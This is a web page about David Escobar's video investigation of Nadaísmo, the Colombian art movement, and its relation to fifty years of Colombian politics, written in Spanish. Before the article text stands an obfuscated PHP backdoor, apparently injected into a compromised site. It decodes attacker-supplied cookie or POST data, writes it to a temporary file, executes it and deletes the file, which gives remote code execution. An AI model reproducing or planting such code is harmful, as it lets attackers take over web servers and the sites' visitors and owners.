$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Nadaísmo por David Escobar – www.interferencechannel.com

Nadaísmo por David Escobar

IMG_7909

Arte y política en el nadaísmo es una investigación que indaga sobre el contexto del arte en Colombia: la historia, los mitos, los documentos del arte y sus mecanismos de registro y producción. Laserie de videos (Nada, arte y políticaMr. Gonzalo Arango, Nada contra corriente, Anti-nadaísmo Guerrero) identifican las reacciones del nadaísmo a la historia política de los últimos 50 años en Colombia.

Este movimiento artístico nace en 1958 como respuesta a la imposición cultural,a los estamentos políticos y religiosos, al academicismo y a las instituciones tradicionales de la sociedad moderna en Colombia. Tiene sus antecedentes en el dadaísmo y el surrealismo, y expresa una protesta que filosóficamente se enmarca en el nihilismo, principalmente desde el género literario, aunque se encontraron otras manifestaciones artísticas en las artes visuales y la música. Fueron simpatizantes jóvenes de distintas regiones del país y Latinoamérica.

En 1957 el escritor Gonzalo Arango crea el movimiento Nadaísta en la ciudad de Cali después de huir de Medellín debido a la caída del dictador Gustavo Rojas Pinilla, Gonzalo militaba y era ficha clave del partido la Tercera fuerza dónde se mantuvo firme hasta la caída de la dictadura. Cuando Laureano Gómez (conservador) y Lleras Restrepo (liberal) se reúnen secretamente en Benidorm (España), el 24 de julio de 1956,  conformando el Frente Nacional, se dividen el poder entre liberales y conservadores, unen fuerzas para tumbar al general boyacense acudiendo a las clases dirigentes del país y proclaman el primer paro patronal de Colombia. Cae el dictador y nace el nadaísmo.

 Estos videos presentan acciones y posturas políticas de los artistas nadaístas en el transcurrir de medio siglo, donde se opusieron o simpatizaron con diferentes pensamientos políticos e ideológicos, con instituciones y/o con empresas privadas.

 Los video fueron realizados con imágenes y audio de archivo, recopilados en 2 años de trabajo, son entrevistas en las que pregunté por acciones específicas realizadas y discusiones en la vida del colectivo frente a temas como el cruce de poder y oposición, políticos y rebeldes, empresarios y artistas.

El trabajo es una revaluación histórica y una reinterpretación de los testimonios de los nadaístas, asociados a las propuestas de candidatos presidenciales o mandatarios, sumado a los cambios en la fuerza productiva y de pensamiento político en el país, que permite reconocer las negaciones y las afirmaciones dialécticas entre arte, política y sociedad.

La realidad está construida de pequeñas ficciones, y es a partir de imaginarios colectivos que intento formar narrativas que nutran otros relatos, otras visiones y valores sobre lo establecido y lo conocido de la historia. Esta investigación propone hacer otros recorridos por la realidad, utilizando la cultura como una caja de herramientas  y el contexto como materia prima, busca tejer una red de signos y significaciones en lugar de considerarlas una forma autónoma u original.♦

*David Escobar P.

NADA from David Escobar Parra on Vimeo.

Comments are closed.